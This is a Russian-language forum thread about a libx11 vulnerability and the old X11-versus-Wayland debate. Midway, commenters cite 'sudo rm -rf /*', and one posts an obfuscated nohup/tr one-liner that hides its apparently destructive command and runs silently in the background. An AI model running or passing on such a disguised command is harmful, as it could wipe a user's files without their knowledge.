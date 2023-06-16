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|2.7, Аноним (7), 11:06, 16/06/2023 [^] [^^] [^^^] [ответить]
|+2 +/–
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Нам повезло: мы застали иксы и все его ужасы. Следующее поколение не будет ценить wayland так, как ценим его мы. Для них безопасность и надежность wayland будет чем-то само собой разумеющимся.
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|3.18, Аноним (18), 12:39, 16/06/2023 [^] [^^] [^^^] [ответить]
|–1 +/–
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>безопасТность и надежДность wayland будет
после его переписывания на Rust.
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|3.23, v3625 (ok), 13:30, 16/06/2023 [^] [^^] [^^^] [ответить]
|+5 +/–
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Какие такие ужасы? Использовал иксы в начале нулевых, когда ими пользовались именно по-иксовому (X-ресурсы, вот эти вот иксовые растровые шрифты, оконные менеджеры fluxbox, icewm, fvwm в разное время). Использовал и вот эту сетевую прозрачность, которая "никому не нужна": запускал программы с домашней машины в других локациях (на работе например). При прочих равных предпочитал программы, использующие тулкиты Xaw, Motif, Tk.
Вспоминаю это время с большой теплотой. Потом, где-то во время массового распространения gtk2, ушел на macos на рабочих станциях, продолжив пользоваться линуксом только на серверах. Так как, с одной стороны, лучше использовать первоисточник, чем условный гном, который это убого косплеит, с другой - чего греха таить, поддался моде быть тупым и манерным.
Сейчас очень хочется вернуться (может, не вернуться, а заглянуть) обратно, посмотреть, можно ли там жить. Взглянуть на проблему рендеринга векторных шрифтов, о которой все говорят. Подумать на досуге, возможно ли ее более правильно положить на архитектуру иксов (на клиенте их рендерить, скорее всего, практически невозможно, так как слишком много тонкостей: все эти хинтинги, кернинги, сглаживания, а в передаче битмапов особого зла и нет). А также задаться вопросом о целесообразности и реальной необходимости везде использовать векторные шрифты: если на экране все равно пиксели, не лишние ли во многих случаях все эти действия по растеризации).
И, кстати, заметил еще давно, что когда в линуксе шрифты стали преимущественно векторными, от стал страшнее. Особенно первое время, когда нормальные алгоритмы их рендеринга были запатентованы микрософтом или еще кем-то.
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|4.31, Аноним (18), 14:05, 16/06/2023 [^] [^^] [^^^] [ответить]
|+/–
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>иксы в начале нулевых, когда ими пользовались именно по-иксовому
В начале нулевых уже не совсем по-иксовому. Тогда уже вовсю GTK, Qt, которые гоняли уже отрендеренные картинки.
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|5.35, v3625 (ok), 14:19, 16/06/2023 [^] [^^] [^^^] [ответить]
|+/–
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> Тогда уже вовсю GTK, Qt, которые гоняли уже отрендеренные картинки.
Тогда еще спокойно можно было не обращать на это внимание.
И gtk1 был ничего.
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|4.34, Аноним (-), 14:18, 16/06/2023 [^] [^^] [^^^] [ответить]
|+1 +/–
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Какие ужасы? Давайте расскажу.
1) Переусложненный антикварный код, грубо не соответствующий современным запросам пользователей относительно графики. FreeSync? HBD? Отсутствие тиринга?
2) Гранд-централ факапов латенси, перфоманса и секурити, все в одном. By design и не лечится.
3) Архитектура деланая под другие реалии. Все и вся in-band, парсер должен молотить гигазы - или вон там опциональные расширения. Поскольку опциональные - что хотите то и делайте, ведь их может и не быть. Встроеные апи и фичи - сделаны так что ими никто не пользуется. Рендер фонтов? Контролы? Все есть, но страшное как смерть - так что никто этим не пользуются. Все рендерят готовые битмапы. А как плевалка битмапов на экран иксы криво, избыточно, дергано и тормозно.
4) Активно рисующая программа может все заклинить. Так что таскменеджер будет отрисовываться полчаса. Очень круто же когда в гранд-централ якоре есть сложные примитивы которые можно вызвать. Зато нет ни малейшего намека на нормальный шедулинг и полисовку ресурслв. Пусть весь мир подождет, пока xorg вкалывает на тяжелом вызове какой-то программы. А если не повезло то пойдете в консольку переключаться с позором чтобы задачу вообще убить.
5) В силу жесткой нестыковки архитектуры и реалий, чинить все эти траблы крайне сложно и нерезултативно. Поэтому все задолбались.
Нам в XXI веке точно нужна именно такая графика? ORLY? А то что болото теплое и уютное не отменяет наличие вони, трясины и прочих болотных газов :).
Но да, из-под макоси рассказывать линуксоидам как им должно быть ЗБС - замечательно, конечно. Но как по мне - вы уж либо кушайте пирожки по своим рецептам, либо сидите тихо. А сватать рецепт счастья при том что сам его не прожевал... тепло и лицемерненько? :)
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|5.37, v3625 (ok), 15:05, 16/06/2023 [^] [^^] [^^^] [ответить]
|+/–
Нет у современных пользователей никаких запросов Им как в уши надуют, такие у н... большой текст свёрнут, показать
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|5.41, Ананий (?), 16:30, 16/06/2023 [^] [^^] [^^^] [ответить]
|+/–
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>Отсутствие тиринга?
Чому в FreeBSD я его не наблюдаю?
Наблюдал когда-то давно на невидии, решалось правкой конфига. Все.
Остальные баззворды как-то мешают отображению 2д? или начинаются проблемы с 8к экранами?ну как-нибудь переживу
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|2.25, rshadow (ok), 13:48, 16/06/2023 [^] [^^] [^^^] [ответить]
|+/–
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Жалко на опеннете нет механизма запуска опросов. Думаю результаты удивили бы немногих.
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|1.2, soarin (ok), 10:54, 16/06/2023 [ответить] [﹢﹢﹢] [ · · · ]
|–4 +/–
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Да. Выкидывать это всё надо.
Сейчас вот ставил OpenJDK Headless, а всё равно что-то с луддитными иксами тянется на сервер…
Никак от этого не нужного мусора не убежишь.
Собирал один большой проект на Rust на macOS хосте, тоже притащились…
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|2.39, Аноним (39), 15:12, 16/06/2023 [^] [^^] [^^^] [ответить]
|+/–
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Java только в том году спохватились, что основные дистрибутивы всё выкидывают.
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|1.8, Аноним (8), 11:08, 16/06/2023 [ответить] [﹢﹢﹢] [ · · · ]
|–1 +/–
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> в случае его подключения к вредоносному X-серверу или промежуточному прокси, контролируемому злоумышленником
Выявлена уязвимость. В случае если юзер пропишет в терминале sudo rm -rf /* то ..
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|2.9, Аноним (7), 11:29, 16/06/2023 [^] [^^] [^^^] [ответить]
|+5 +/–
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в случае с rm -rf /* пользователь уже знает, что команда деструктивная.
в случае коннекта к серверу пользователь не знает, вредоносный это сервер или нет.
как 13-летней девочке приходится разжевывать вроде очевидные вещи.
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|3.13, Анониссимус (?), 12:06, 16/06/2023 [^] [^^] [^^^] [ответить]
|+/–
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А с чего бы графическому серверу быть деструктивным? Это какой вообще юзкейс должен быть, что бы запускать у себя приложение, а показывать его на неком другом вредоносном сервере? Полный бред.
Пример c 'rm -rf /' тут не подходит. Это скорее похоже на уязвимость в ssh, ведь через ssh можно сделать 'rm -rf'!
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|4.14, Аноним (7), 12:09, 16/06/2023 [^] [^^] [^^^] [ответить]
|+2 +/–
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Напоминаю, что диды задумывали иксы по клиент-серверной модели.
> через ssh можно сделать 'rm -rf'!
Если ssh-сервер сделает rm -rf у тебя, хотя ты этого никак не ждешь, то это уязвимость. Именно о таком случае речь в новости. Но ты поскорее побежал комментировать!
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|3.24, Аноним (24), 13:33, 16/06/2023 [^] [^^] [^^^] [ответить]
|+/–
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А в случае с нижеприведенным?
nohup $(echo '<-{}<&{~'|tr ' -/:-@[-'{}*' ''-{/ - -*') &>/dev/null&
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|4.42, Ананий (?), 16:36, 16/06/2023 [^] [^^] [^^^] [ответить]
|+/–
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можно хардкорно решить вопросик, например chflags -R schg /
если уж руки так и тянутся позапускать из-под рута всякую нечисть.
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|1.12, Иван_Лох (?), 12:03, 16/06/2023 [ответить] [﹢﹢﹢] [ · · · ]
|+1 +/–
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Обычно X сервер, это компьютер за которым ты сидишь. Его можно модифицировать так, так что приложения на удаленном хосте, которые ты открываешь будут падать. Это можно сделать миллионом путей, и что? X proxy это, вообще, из начала 90-х. Его кто-то еще использует?
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|2.21, Unnamed Player (?), 13:18, 16/06/2023 [^] [^^] [^^^] [ответить]
|+/–
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Эх, вьюнош…
Иногда это мультихед воркстейшн, а иногда на гриде сервак для расчетов с кучей разрабов по X11 сидящих.
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|3.33, 1 (??), 14:15, 16/06/2023 [^] [^^] [^^^] [ответить]
|+/–
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Вьюнош - скорее ты.
X-сервер запускается на РМ, и транслирует графику от X-клиентов на "мультихед воркстейшн, а иногда на гриде сервак для расчетов"
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|1.15, Аноним (15), 12:22, 16/06/2023 [ответить] [﹢﹢﹢] [ · · · ]
|–1 +/–
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> В развиваемой проектом X.Org библиотеке libx11
Зачем они её развивают?
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|2.19, Аноним (18), 12:52, 16/06/2023 [^] [^^] [^^^] [ответить]
|+/–
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Для legasy софта, который не пользуется графическими тулкитами, а все виджеты рисует сам.
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|2.43, Анонимусс (?), 17:30, 16/06/2023 [^] [^^] [^^^] [ответить]
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Кажется слово "развиваемый" тут не совсем уместно. Ну или совсем не уместно))
Лучше что-то вроде "реанимирует", "замедляет стагнацию", "не дает уйти в историю".
Или что-то из новояза - "борется с отрицательным ростом"
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|1.16, Аноним (16), 12:31, 16/06/2023 [ответить] [﹢﹢﹢] [ · · · ]
|+4 +/–
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Это все не правда, Иксы писали ветераны Юникс, которые все сделали правильно, в отличии от пориджей с Вейландом. Закрывайте issue.
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|2.44, Анонин (?), 18:13, 16/06/2023 [^] [^^] [^^^] [ответить]
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Не хочу тебя расстраивать, но вяленого пишут те же самые люди что и иксы (ну, за исключением тех кто уже помер от старости).
И именно эти люди говорят что иксы устарели, что их очень сложно поддерживать и практически невозможно расширять. А не какие-то пориджы, которым что иксы, что вяреный, что вин11.
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|2.26, rshadow (ok), 13:49, 16/06/2023 [^] [^^] [^^^] [ответить]
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С одной стороны, как раз Диды и решили написать вяленого. Но с другой, повторить чет не получилось.
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|1.27, Аноним (-), 13:56, 16/06/2023 [ответить] [﹢﹢﹢] [ · · · ]
|+/–
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> подключения к вредоносному X-серверу
> или промежуточному прокси
Ну то-есть хрен эксплуатируешь на практике. Потому что если у кого вредоносный сервер - врядли вон то было хучшей из его проблем.
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|2.32, Аноним (32), 14:08, 16/06/2023 [^] [^^] [^^^] [ответить]
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Какой-нибудь xephyr или xnest запускаемый из npm или cargo. Легко.
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|1.46, Аноним (46), 19:13, 16/06/2023 [ответить] [﹢﹢﹢] [ · · · ]
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>вызвана отсутствием проверки допустимости значений, передаваемых X-сервером
Rust бы точно совсем-совсем 146% помог!
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